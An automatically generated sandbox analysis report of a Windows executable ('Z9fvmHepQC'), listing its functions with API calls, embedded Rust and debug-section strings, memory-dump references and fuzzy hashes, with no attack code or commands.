ProcessPrng.BCRYPTPRIMITIVES(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF66E106718), ref: 00007FF66E1067C9

Part of subcall function 00007FF66E0DF6E0: TlsAlloc.KERNEL32(?,?,?,?,?,?,-00000008,00000000,00000001,?,00007FF66E1067FC), ref: 00007FF66E0DF72A
Part of subcall function 00007FF66E0DF6E0: InitOnceComplete.KERNEL32(?,?,?,?,?,?,-00000008,00000000,00000001,?,00007FF66E1067FC), ref: 00007FF66E0DF76E

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: Value$AllocCompleteInitOncePrngProcess
String ID:
API String ID: 26077812-0
Opcode ID: 4edb42c680f0164e9d1c72f79fe9fe7ea70df06d6c68e7da6fdde4f190e5d4a6
Instruction ID: f958129dbc2917a005f52dfe77c6b6c4ca053738462fad6f5abe344e83e579cf
Opcode Fuzzy Hash: 4edb42c680f0164e9d1c72f79fe9fe7ea70df06d6c68e7da6fdde4f190e5d4a6
Instruction Fuzzy Hash: B931D424E29247D2FA55972094113B962B5AF74304F988539F90ECEBD1EE3CF4D1D248

Function 00007FF66E106700 Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF66E106718), ref: 00007FF66E10673B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF66E106718), ref: 00007FF66E106761
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF66E106718), ref: 00007FF66E1067B4
ProcessPrng.BCRYPTPRIMITIVES(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF66E106718), ref: 00007FF66E1067C9

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: Value$PrngProcess
String ID:
API String ID: 3259538350-0
Opcode ID: 588b169b4117b5d4b8879caaf6fe924ecd94b8e42a86c495c1b41ebd2ac45bee
Instruction ID: 1fee8ad55823d69d872cd9b824a13e2bf88185145f17cf0c371665f0af95a6de
Opcode Fuzzy Hash: 588b169b4117b5d4b8879caaf6fe924ecd94b8e42a86c495c1b41ebd2ac45bee
Instruction Fuzzy Hash: 8D212925E29746C5FB19972098017B9A3B1AF78304F484439FE4D8ABD1EE3CF4D1D244

Function 00007FF66DFAAEE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadDescription.KERNELBASE ref: 00007FF66DFAAF2A

Part of subcall function 00007FF66E102DB0: WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001,00000215D79F13A0,?,?,?,00007FF66DFAAFA6), ref: 00007FF66E102ED0

Part of subcall function 00007FF66E102750: WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,-00000008,-00000006,00000001,?,00007FF66DFAAFC9), ref: 00007FF66E10281A

Strings

main, xrefs: 00007FF66DFAAF20

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: AddressSingleWake$DescriptionThread
String ID: main
API String ID: 1846246661-3207122276
Opcode ID: 509eb113969ebaa81318ea2f85c0d662066716ac3b41824aecd06d142fea7b77
Instruction ID: 71b4320355e85a48e99f2fed1dd4d702a4fcd01e22b8bae017fbb5450a3d4c0d
Opcode Fuzzy Hash: 509eb113969ebaa81318ea2f85c0d662066716ac3b41824aecd06d142fea7b77
Instruction Fuzzy Hash: 8C410836E05B42D9FB10DBA0E4913ED37B4AF54308F944436EA4C9B795EF789159C384

Function 00000215D76F7B9C Relevance: 1.6, APIs: 1, Instructions: 149
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000215D76F7C64

Memory Dump Source

Source File: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000215D76E0000, based on PE: true

Associated: 00000000.00000002.3254228521.00000215D771E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_215d76e0000_Z9fvmHepQC.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d4af7de97e5f5be688b556db8afd153c006a3b745c34cce90d3c1c24bb727529
Instruction ID: 213ea89caad573a00947198bf4be10e0138c7b54677db9a0dfb455896bf6eb06
Opcode Fuzzy Hash: d4af7de97e5f5be688b556db8afd153c006a3b745c34cce90d3c1c24bb727529
Instruction Fuzzy Hash: 44719836219F8486DAA0CB09F49036AB7A0F7C8B98F504525EBCE83B69DF3DD555CB00

Function 00007FF66E071A3C Relevance: 1.3, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF66E071B26

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 6683a3c2c8b6b7f467e2841cfb5fd917e78bb33ecc39277beb1150b20f46cb97
Instruction ID: 4c3180ff732ecea61b60dc6a07b7857d5d59a77409e905e9bd28747f48e53539
Opcode Fuzzy Hash: 6683a3c2c8b6b7f467e2841cfb5fd917e78bb33ecc39277beb1150b20f46cb97
Instruction Fuzzy Hash: B9213662B0970692EE148B12A8203765561AB717F0F144735FE7D8B7C0FE7CB5A9C308

Function 00000215D76F780C Relevance: 1.3, APIs: 1, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00000215D76F7959

Memory Dump Source

Source File: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000215D76E0000, based on PE: true

Associated: 00000000.00000002.3254228521.00000215D771E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_215d76e0000_Z9fvmHepQC.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction ID: 18b2f622a76412e969cf92e3952cc0f444199a0d31114b5d508fccb2dc3b7099
Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction Fuzzy Hash: 8D418872618B84C7DB50CB1AF44471AB7A1F7D8B94F504225FA9E87B68DB3CD851CB00

Function 00007FF66E1EBFF9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E1EC035

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 5d7ef3c081dc9df231fd70588046b5c6274a2eaa279377e622065271de711ee9
Instruction ID: b9202fe6f8943a8ff2c56137865ae61abc6e4eb562b34dec38cdcd0c1331893b
Opcode Fuzzy Hash: 5d7ef3c081dc9df231fd70588046b5c6274a2eaa279377e622065271de711ee9
Instruction Fuzzy Hash: 8D217176704A81C2E925DB26E9553EEA731EB58BD0F408031FF5E8BB95DE3CE4829304

Function 00007FF66E2433DB Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E243410

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 9264a6f4ae5f56173e9a9a8ecf5a3900a50d9ea0765c8f6750152c6475cef05c
Instruction ID: b25be86eceaaed24bc2408055e60405e9e727bab7beae877b0e501750ee479c4
Opcode Fuzzy Hash: 9264a6f4ae5f56173e9a9a8ecf5a3900a50d9ea0765c8f6750152c6475cef05c
Instruction Fuzzy Hash: 5DF082A3B04A41D3DA158F57E94045AA730FB18FD07088831EF5C87B41DE38D5F29248

Function 00007FF66E0CB97D Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF66E0CB31A: memcpy.MSVCRT ref: 00007FF66E0CB352

memcpy.MSVCRT ref: 00007FF66E0CB9B5

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8e2849de6149072a46ea44b45f06e36b053381f36ed4c1ccf5ce320a2333aa00
Instruction ID: 8b8d3b9a7c013c84f7edc8ef64374a7383c7ccdaf050fa5cb2da3e46f4c49ba6
Opcode Fuzzy Hash: 8e2849de6149072a46ea44b45f06e36b053381f36ed4c1ccf5ce320a2333aa00
Instruction Fuzzy Hash: 32F0A02260464581FA602A15F6103FF5162A794780F088134DE9C4F7C2DE3CD09A4700

Non-executed Functions

Function 00007FF66E0E6F20 Relevance: 34.1, APIs: 17, Strings: 4, Instructions: 2623COMMON

Download Yara Rule

Strings

.debug_tu_index.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwo, xrefs: 00007FF66E0EA437
assertion failed: end >= start && end <= len, xrefs: 00007FF66E0EA8EA, 00007FF66E0EA932
.debug_cu_index.debug_frame.eh_frame_hdr.debug_macinfo.debug_macro, xrefs: 00007FF66E0EA3A0
.debug_abbrev.debug_addr.debug_info.debug_line.debug_line_str.debug_str.debug_str_offsets.debug_str_sup.debug_types.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_aranges.debug_pubnames.debug_pubtypes, xrefs: 00007FF66E0E70CD

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: .debug_abbrev.debug_addr.debug_info.debug_line.debug_line_str.debug_str.debug_str_offsets.debug_str_sup.debug_types.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_aranges.debug_pubnames.debug_pubtypes$.debug_cu_index.debug_frame.eh_frame_hdr.debug_macinfo.debug_macro$.debug_tu_index.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwo$assertion failed: end >= start && end <= len
API String ID: 0-4179323916
Opcode ID: f885839a468a762f4b4e83704a7cdad7ce2697d05d3a0686e04c228603eeac9a
Instruction ID: 7a4b289ba370e66458b870d0b89451429a3500d9c521213259c51ba036434940
Opcode Fuzzy Hash: f885839a468a762f4b4e83704a7cdad7ce2697d05d3a0686e04c228603eeac9a
Instruction Fuzzy Hash: BD537E22A09FC5C9EBB08F25D8443E923B5FB54788F445136DA4D9FB99DF38A2A1C344

Function 00007FF66E0EAFA0 Relevance: 21.7, APIs: 11, Strings: 2, Instructions: 2198COMMON

Download Yara Rule

Strings

8, xrefs: 00007FF66E0ECAEE
assertion failed: end >= start && end <= len, xrefs: 00007FF66E0EDD0D, 00007FF66E0EDD2A

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: 8$assertion failed: end >= start && end <= len
API String ID: 0-1013222689
Opcode ID: d0e9ce743c92fbb737e643746edfc0164baf5784c0a37503959ef034958d8c21
Instruction ID: d69b76927f18232d1c03fe7ee871e962d18c35e6d34db2617dfd820237b46514
Opcode Fuzzy Hash: d0e9ce743c92fbb737e643746edfc0164baf5784c0a37503959ef034958d8c21
Instruction Fuzzy Hash: 69238A72A08BC5C5EB608F25D8443E927B0FB64B88F444136EA5D9FB98DF39D6A5C304

Function 00007FF66E06A936 Relevance: 17.5, APIs: 5, Strings: 6, Instructions: 1010COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E06AA9C
memcpy.MSVCRT ref: 00007FF66E06AF04
memcpy.MSVCRT ref: 00007FF66E06B4E6
memcpy.MSVCRT ref: 00007FF66E06B628
memcpy.MSVCRT ref: 00007FF66E06B6A3

Strings

capacity overflow, xrefs: 00007FF66E06BBD5
remove_constant_phis: entry block unknown, xrefs: 00007FF66E06BC46
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E06BC0D
assertion failed: edge.block != entry_block, xrefs: 00007FF66E06BB7D
Iterator supplied too few elements, xrefs: 00007FF66E06BAB9
assertion failed: mb_old_absval.is_none(), xrefs: 00007FF66E06AFDD

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: Iterator supplied too few elements$assertion failed: edge.block != entry_block$assertion failed: mb_old_absval.is_none()$called `Result::unwrap()` on an `Err` value$capacity overflow$remove_constant_phis: entry block unknown
API String ID: 3510742995-2067728096
Opcode ID: 1f3282391a34e57d3ea08661ce9898bba433284cab20aac5be7e6e5727a027a6
Instruction ID: 2c4b887dfea8a1ff2154edbd0136895b84246f64ee12ffb6f0279f106a617044
Opcode Fuzzy Hash: 1f3282391a34e57d3ea08661ce9898bba433284cab20aac5be7e6e5727a027a6
Instruction Fuzzy Hash: 94A29F72608AC6C1EA70DB16E4403EAB3B0FB94784F544136EA9D8BB99DF3CD595CB04

Function 00007FF66DFE6ACF Relevance: 16.2, APIs: 4, Strings: 6, Instructions: 1157COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66DFE8D99
memcpy.MSVCRT ref: 00007FF66DFE8EEF
memcpy.MSVCRT ref: 00007FF66DFE8F93
memcpy.MSVCRT ref: 00007FF66DFE918D

Strings

capacity overflow, xrefs: 00007FF66DFFAC2C
, xrefs: 00007FF66DFFAEB1
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66DFFB9A5, 00007FF66DFFBA63
, xrefs: 00007FF66DFFAEF4
q, xrefs: 00007FF66DFE91F2
Argument stack offset greater than 2GB; should hit impl limit first, xrefs: 00007FF66DFE8B3A

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: $ $Argument stack offset greater than 2GB; should hit impl limit first$called `Result::unwrap()` on an `Err` value$capacity overflow$q
API String ID: 3510742995-461167430
Opcode ID: e3d1849368c565f5a2010b60b42a62a5001999d873ecce7e34f8f3c609503f84
Instruction ID: db4bea3023967829c2717bc11a8f05b1d9e789eed9cdaaeee034b57beb9533bc
Opcode Fuzzy Hash: e3d1849368c565f5a2010b60b42a62a5001999d873ecce7e34f8f3c609503f84
Instruction Fuzzy Hash: ECC27A72A08AC6C5DA60DB15E4403EE73B5EBD8B84F408136DA8D8BB9AEF3CD545C744

Function 00007FF66E0EEAE0 Relevance: 13.2, APIs: 6, Strings: 2, Instructions: 1189COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E0EEB7A

Strings

@, xrefs: 00007FF66E0F042C
assertion failed: end >= start && end <= len, xrefs: 00007FF66E0F0963

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: @$assertion failed: end >= start && end <= len
API String ID: 3510742995-884486453
Opcode ID: 64eda54c603b5dcfa28ba000039e6a23a48ed32c7a715b452495b47dc997f9f0
Instruction ID: 1cbe2cace133bfac4b3f3a9e56b6c8aaffafc179981de2598344383d39662444
Opcode Fuzzy Hash: 64eda54c603b5dcfa28ba000039e6a23a48ed32c7a715b452495b47dc997f9f0
Instruction Fuzzy Hash: 1CC28032A08AC6C5EB608F21D8543F92375FB64788F544136EE5D9FB89EF389665C308

Function 00007FF66E0FEB00 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 358COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF66E0FEC65
RtlCaptureContext.KERNEL32 ref: 00007FF66E0FEC6D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF66E0FEC91
RtlVirtualUnwind.KERNEL32 ref: 00007FF66E0FEE08

Part of subcall function 00007FF66E0FF180: SetLastError.KERNEL32 ref: 00007FF66E0FF2AA
Part of subcall function 00007FF66E0FF180: GetEnvironmentVariableW.KERNEL32 ref: 00007FF66E0FF2BC
Part of subcall function 00007FF66E0FF180: GetLastError.KERNEL32 ref: 00007FF66E0FF2C8
Part of subcall function 00007FF66E0FF180: GetLastError.KERNEL32 ref: 00007FF66E0FF2E1

Strings

RUST_LIB_BACKTRACERUST_BACKTRACEunsupported backtracedisabled backtrace, xrefs: 00007FF66E0FEB42

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
